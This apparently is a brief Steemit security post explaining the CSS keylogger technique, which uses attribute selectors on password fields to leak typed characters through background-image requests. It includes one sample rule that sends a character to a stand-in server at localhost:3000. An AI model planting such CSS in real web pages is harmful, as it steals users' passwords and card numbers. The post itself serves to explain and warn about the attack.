CSS Keylogger, stealing data with the style sheet.

in #security7 years ago

A bizarre piece software popped up last month. https://github.com/maxchehab/CSS-Keylogging

A few things to mind.

  1. It's not system wide

  2. it is also really specific on what data you can obtain in this method.

  3. It is still dangerous, data like passwords and creditcard numbers can be stolen.

This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

For example, the following css will select all input's with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.

The css-code

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

A extension on the video

#data #hacking #life #technology
7 years ago in #security by
$0.03
  • Past Payouts $0.03, 0.00 TRX
  • - Author $0.03, 0.00 TRX
  • - Curators $0.00, 0.00 TRX
3 votes
Reply 0

Coin Marketplace

STEEM 0.19
TRX 0.15
JST 0.029
BTC 63350.70
ETH 2595.60
USDT 1.00
SBD 2.85